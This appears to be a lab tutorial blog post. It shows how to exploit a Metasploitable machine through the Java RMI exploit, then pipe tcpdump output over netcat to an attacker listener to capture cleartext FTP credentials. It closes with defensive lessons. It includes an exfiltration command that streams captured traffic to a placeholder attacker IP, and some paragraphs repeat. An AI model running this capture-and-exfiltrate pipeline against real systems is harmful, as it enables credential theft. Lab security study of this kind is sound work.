How to Capture Traffic On Target System (Credentials)
Hacky Hack Concept
The article today is about capturing traffic on a target machine. The scenario we are playing out is this:
1. Attacker machine gains access to target through exploit
2. Attacker captures all traffic on target machine and automatically sends the data back to attacking machine
3. Desired traffic being captured is credentials
4. From target machine a user, who has no idea all traffic is being captured logs on to service (we are doing an FTP login)
Set up Lab Environment
For my lab environment I have configured it as follows.
a. M1 (Kali), M2 (metasploitable/primary target), M3 (metasploitable/ftp server)
b. All machines on a host only DHCP network
The Process
M1 start listener that will append all data received to a file called "creds.txt"
In a different terminal I run a known exploit against M2. This is a PoC (Proof of Concept) lab so it is ok to have a target that is as vulnerable as metasploitable is. Additionally I could have gone with many different exploits, I picked an easy one.
"java rmi server" exploit is extremely easy to run against metasploitable as all you need to set is "rhosts" and "lhosts"
1. Meterpreter shell is created. type shell
2. confirm who you are with whoami. As root we can set a packet capture that will grab everything.
3. type tcpdump D this will tell us all the interfaces on your target system. You can grab data from all available interfaces but for our purposes eth0 suffices.
4. Then finally the line that is so important
tcpdump -i eth0 -X 2>&1 / nc <attacker IP> <listening port on attacker>
What's happening
I'm using the application tcpdump, setting the interface to eth0, requesting HEX to be included in the packets, putting the output to pipe to the connection that is listening on the attacker.
Now we need to generate traffic on M2 (target). We start by sending a few ICMP packets.
Followed by logging into the FTP server located on M3. Remember that FTP is a clear text protocol, so if we are able to observe these packets we will be able to see the credentials.
I closed the packet capture from the terminal running the metasploit exploit. Next I check if there is any data in the "creds.txt" file. Good news! there is! Let's open it up.
This next step can be done with grep just as easily, however I wanted the visual of leafpad. Additionally, like with any text editor ctrl + f is very useful for finding things.
Now we need to generate traffic on M2 (target). We start by sending a few ICMP packets.
I closed the packet capture from the terminal running the metasploit exploit. Next I check if there is any data in the "creds.txt" file. Good news! there is! Let's open it up.
This next step can be done with grep just as easily, however I wanted the visual of leafpad. Additionally, like with any text editor ctrl + f is very useful for finding things.
I search for "user"
BOOM! we got it!
I scroll down a few more packets and I can see my next favourite word "pass"
I scroll down a few more packets and I can see my next favourite word "pass"
Lessons Learned
There are some pieces happening during this data exchange that are important to take note of.
From the offensive side, the ability to grab data happening on target is extremely useful. Not only can we gather potential credentials we can also learn more about the target environment which is valuable for deeper ingraining into the network. From a packet capture we can learn other devices, services, habits occuring with the infrastructure in play.
Yes this example was showing an offensive strategy, however there are some key pieces to pull out here from a defensive standpoint.
1. OS Hardening: Metasploitable is an intentionally vulnerable machine, there are many ways to poke holes in it. So it may seem obvious that we shouldn't be running a machine like this in a production. However, many people tolerate the risk of having un-patched hardware in their network environment. Even one weak machine poses a threat to a network, an avenue for attack.
2.Monitoring Logs: Had the user on M2 looked at logs they would have seen some interesting activities. For example why was there an open connection to a machine? Why was there a constant stream of data to that machine? Why was root doing this? Who was working that day? Were they on this machine? There are many logs to monitor and can be put together to give the bigger picture of the event.
3. Authentication: Approved users only. Multiple layers of authentication.
4. Reduce the Attack Vectors: In my lab example I had a perfect scenario, I had vulnerable machines and I was utilizing a clear text protocol. Now I wish I could say this was abnormal, but truth be told I have literally seen environments like this. Client's having a mentality of "If it ain't broke...." This is a dangerous mentality and I think generally people are beginning to wake up to the real world threats.
Thanks for reading!
Below is a video of the exact same process.
